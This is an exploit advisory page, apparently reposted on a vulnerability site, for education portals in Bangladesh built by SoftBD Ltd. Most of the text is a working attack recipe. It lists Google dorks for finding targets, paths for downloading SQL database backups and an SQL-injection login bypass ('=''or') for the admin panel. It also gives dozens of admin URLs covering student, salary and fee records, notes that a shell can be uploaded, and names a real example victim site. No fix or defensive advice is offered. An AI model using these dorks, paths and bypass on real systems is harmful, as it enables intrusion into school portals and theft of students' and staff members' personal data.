Design & Developed by SoftBd Ltd. Bangladesh Education Portals Multiple Vulnerabilities

2018.09.04
tr KingSkrupellos (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264
CWE-592
CWE-434
Dork: intext:DEVELOPED BY : SOFTBD Ltd. site:edu.bd

################################################################################################# # Exploit Title : Design & Developed by SoftBd Ltd. Bangladesh Education Portals Multiple Vulnerabilities # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 04/09/2018 # Vendor Homepage : soft-bd.com ~ softbdltd.com # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : + CWE-264 - Permissions, Privileges, and Access Controls + CWE-592 - Authentication Bypass Issues + CWE-434 - Unrestricted Upload of File with Dangerous Type ################################################################################################# # Description : Bangladesh’s leading custom software [ for Government and Education portals ] web application development company. + SoftBD Ltd | Best Website Design and Development Company in Bangladesh # Google Dorks : intext:DEVELOPED BY : SOFTBD Ltd. site:edu.bd inurl:''Design & Developed by : SOFTBD Ltd.'' site:edu.bd inurl:''/teachers_information.php site:edu.bd inurl:''/student_information.php site:edu.bd inurl:/holiday_calendar.php site:edu.bd inurl:''/academic_calendar.php site:edu.bd inurl:''/rules_regulation.php site:edu.bd inurl:''/class_routine.php site:edu.bd inurl:''/examination_routine.php site:edu.bd inurl:''/3rd_&_4th_class_employee_information.php site:edu.bd inurl:''/department.php?id=MDc= site:edu.bd inurl:''/facilities.php?id=MQ== site:edu.bd inurl:''/general_notice.php site:edu.bd inurl:''/admission.php?id=MDc= site:edu.bd inurl:''/teachers_information_archive.php site:edu.bd inurl:''academic_calendar_view.php'' site:edu.bd + Database SQL Backup Download [ Navicat MySQL Data Transfer Juicy Informations here ] => TARGET/trust_college_db.sql TARGET/school_system-current.sql TARGET/school_system-last.sql TARGET/school_system.sql TARGET/school_system_fress.sql # Administration Login Panel Path => TARGET/login_slide.php # Exploit : Admin Username : '=''or' Admin Password : '=''or' # Useable Admin Control Panel URL Links => /modules/dashboard/index.php /modules/dashboard/school_profile.php /modules/dashboard/calendar.php /modules/dashboard/class_list.php /modules/dashboard/session_list.php /modules/dashboard/group_sms_excel_upload.php /modules/system_module/index.php /includes/components/sms_gateway_data_update.php /modules/dashboard/school_social_network_link.php /modules/dashboard/student_excel_upload.php /modules/system_task/index.php /modules/dashboard/teacher_excel_upload.php /modules/dashboard/user_group.php /modules/dashboard/user_group_role.php /modules/accounts/tution.php /modules/accounts/teacher_salary_add.php /modules/accounts/keyword_setup.php /modules/accounts/fee_setup.php /modules/accounts/account_template.php /modules/accounts/expenditure_add.php /modules/accounts/due_payment_list.php /modules/users/user_add_new.php /modules/users/user_list.php /modules/student/list.php /modules/student/add_form_simple.php /modules/student/student_promotion.php /modules/student/student_list_report.php /modules/student/lecture_sheet_download.php /modules/student/advising_student.php /modules/school_setup/basic.php /modules/school_setup/class.php /modules/school_setup/sms_template.php /modules/school_setup/subject.php /modules/school_setup/designation.php /modules/school_setup/teacher_sarary_template.php /modules/school_setup/class_routine.php /modules/school_setup/period_setup.php /modules/school_setup/school_sms_bill_payment.php /modules/teacher/list.php /modules/teacher/index.php /modules/attendance/daily.php /modules/teacher/schedule_rpt.php /modules/teacher/lecture_sheet_upload.php /modules/exam/exam_setup.php /modules/exam/add_mark_list.php /modules/exam/edit_mark_list.php /modules/exam/exam_setup_edit_list.php /modules/notice/sms_group_template.php /modules/dashboard/user_group_role.php /modules/report/student_fee_report.php /modules/report/student_due_fee_report.php /modules/report/teacher_salary_report.php /modules/report/expenditure_report.php /modules/report/income_report.php /modules/report/account_statement_report.php /modules/report/attendance_report.php /modules/report/exam_report.php /modules/report/student_exam_mark_report.php /modules/report/std_exam_mark_rpt.php /modules/report/sms_report.php /modules/report/teacher_list_report.php /modules/report/hostel_room_allocation.php /modules/report/exam_attendance_sheet_list.php /modules/report/exam_seat_planing_print_list.php /modules/website/general_notice_list.php /modules/website/departmental_notice_list.php /modules/website/college_facilities_list.php /modules/website/event_list.php /modules/website/admission_list.php /modules/website/slider_list.php Note : Some of the vulnerable sites, it can be upload shell. ################################################################################################# # Example Vulnerable Site => uuc.edu.bd => [ Proof of Concept ] => archive.is/eGqUH ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top